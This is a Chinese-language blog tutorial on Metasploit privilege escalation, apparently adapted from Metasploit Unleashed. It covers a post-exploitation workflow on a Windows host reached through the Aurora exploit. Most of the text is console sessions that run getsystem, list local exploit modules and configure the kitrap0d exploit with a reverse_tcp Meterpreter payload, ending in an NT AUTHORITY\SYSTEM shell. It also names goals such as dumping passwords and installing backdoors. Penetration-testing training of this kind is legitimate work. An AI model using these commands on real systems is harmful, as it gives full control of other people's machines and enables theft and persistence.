不乱于心,不困于情。
不畏将来,不念过往。如此,安好。

metasploit特权提升

通常,尤其是对于客户端漏洞利用,您会发现您的会话仅具有有限的用户权限。这会严重限制您可以在远程系统上执行的操作,例如转储密码,操纵注册表,安装后门等。幸运的是,Metasploit具有Meterpreter脚本getsystem,它将使用多种不同的技术来尝试获得SYSTEM级别。远程系统上的特权。还有其他各种(本地)漏洞也可用于提升特权。

昭著的“ Aurora”漏洞,会发现Meterpreter会话仅以常规用户帐户运行。

msf exploit(ms10_002_aurora) >
[*] Sending Internet Explorer "Aurora" Memory Corruption to client 192.168.1.161
[*] Sending stage (748544 bytes) to 192.168.1.161
[*] Meterpreter session 3 opened (192.168.1.71:38699 -> 192.168.1.161:4444) at 2010-08-21 13:39:10 -0600

msf exploit(ms10_002_aurora) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > getuid
Server username: XEN-XP-SP2-BARE\victim
meterpreter >

获取系统

要使用getsystem命令,如果尚未加载,则需要先加载“ priv”扩展名。

meterpreter > use priv
Loading extension priv...success.
meterpreter >

使用-h开关运行getsystem 将显示我们可用的选项。

meterpreter > getsystem -h
Usage: getsystem [options]

Attempt to elevate your privilege to that of local system.

OPTIONS:

    -h        Help Banner.
    -t   The technique to use. (Default to '0').
		0 : All techniques available
		1 : Service - Named Pipe Impersonation (In Memory/Admin)
		2 : Service - Named Pipe Impersonation (Dropper/Admin)
		3 : Service - Token Duplication (In Memory/Admin)


meterpreter >

我们将让Metasploit通过不带任何选项的getsystem运行为我们做繁重的工作。该脚本将尝试所有可用的方法,并在成功时停止。眨眼之间,我们的会话现在就以SYSTEM特权运行。

meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

本地漏洞

在某些情况下,getsystem失败。例如:

meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied.
meterpreter >

发生这种情况时,我们可以使会话成为后台,并手动尝试Metasploit必须提供的其他一些利用。注意:可用的漏洞利用会随着时间而变化。

meterpreter > background
[*] Backgrounding session 1...
msf exploit(ms10_002_aurora) > use exploit/windows/local/
...snip...
use exploit/windows/local/bypassuac
use exploit/windows/local/bypassuac_injection
...snip...
use exploit/windows/local/ms10_015_kitrap0d
use exploit/windows/local/ms10_092_schelevator
use exploit/windows/local/ms11_080_afdjoinleaf
use exploit/windows/local/ms13_005_hwnd_broadcast
use exploit/windows/local/ms13_081_track_popup_menu
...snip...
msf exploit(ms10_002_aurora) >

让我们尝试对目标使用著名的kitrap0d漏洞。我们的示例框是一台32位计算机,被列为易受攻击的目标之一。

msf exploit(ms10_002_aurora) > use exploit/windows/local/ms10_015_kitrap0d
msf exploit(ms10_015_kitrap0d) > set SESSION 1
msf exploit(ms10_015_kitrap0d) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms10_015_kitrap0d) > set LHOST 192.168.1.161
msf exploit(ms10_015_kitrap0d) > set LPORT 4443
msf exploit(ms10_015_kitrap0d) > show options

Module options (exploit/windows/local/ms10_015_kitrap0d):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)
   LHOST     192.168.1.161    yes       The listen address
   LPORT     4443             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 2K SP4 - Windows 7 (x86)


msf exploit(ms10_015_kitrap0d) > exploit

[*]  Started reverse handler on 192.168.1.161:4443 
[*]  Launching notepad to host the exploit...
[+]  Process 4048 launched.
[*]  Reflectively injecting the exploit DLL into 4048...
[*]  Injecting exploit into 4048 ...
[*]  Exploit injected. Injecting payload into 4048...
[*]  Payload injected. Executing exploit...
[+]  Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*]  Sending stage (769024 bytes) to 192.168.1.71
[*]  Meterpreter session 2 opened (192.168.1.161:4443 -> 192.168.1.71:49204) at 2014-03-11 11:14:00 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
赞(0)
未经允许不得转载:seo优化_前端开发_渗透技术 » metasploit特权提升